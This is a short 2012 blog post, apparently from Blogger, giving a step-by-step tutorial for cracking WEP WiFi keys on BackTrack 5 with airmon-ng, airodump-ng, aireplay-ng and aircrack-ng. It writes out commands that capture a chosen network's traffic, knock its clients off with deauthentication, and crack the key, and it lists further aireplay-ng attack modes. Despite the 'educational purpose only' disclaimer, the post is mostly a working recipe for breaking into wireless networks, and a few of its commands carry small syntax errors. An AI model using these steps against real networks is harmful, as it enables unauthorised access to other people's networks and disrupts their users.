This is for educational purpose only and im not responsible if any illegal activity
English French German Spain Italian Dutch Russian Portuguese Japanese Korean Arabic Chinese Simplified

Saturday 21 January 2012

How To Hack Wifi Wep Keys With BackTrack 5 ( Command)



1.Find ur interface type :
airmon-ng 
and your screen will show up like this :
Example output

2.then, you need to enable your monitor type:
airmon-ng start wlan0
and your screen will show up like this :

mon0 is your monitor


3.now, you need to scan wireless around you that your wireless card can capture type :
airodump-ng mon0

hold control button(ctrl)and press c button to stop scanning


4.next step, select your target and copy bssid and type:
airodump-ng -w(CreateFile) --bssid(target bssid)-c(channel target use) mon0(your monitor)
Example :
airodump-ng -w target -bssid 98:FC:11:61:5A:50 -c 11 mon0


5.now you need to deauthenticate
then type:
aireplay-ng -0 0 -b 98:FC:11:61:5A:50 -c 5C:59:48:73:CC:31 mon0
*you cant use another like this* is up to you

- -deauth count : deauthenticate 1 or all stations (-0)
- -fakeauth delay : fake authentication with AP (-1)
- -interactive : interactive frame selection (-2)
- -arpreplay : standard ARP-request replay (-3)
- -chopchop : decrypt/chopchop WEP packet (-4)
- -fragment : generates valid keystream (-5)
- -test : injection test (-9)



6.now wait until get data about 10000 and try crack type:
aircrack-ng -w /pentest/passwords/john/password.lst target-01.cap(with dictionary)
aircrack-ng target-01.cap (without dictionary)


note: if failed u need to get more data
Example output

ENJOY~~

0 comments:

Post a Comment

Blogger news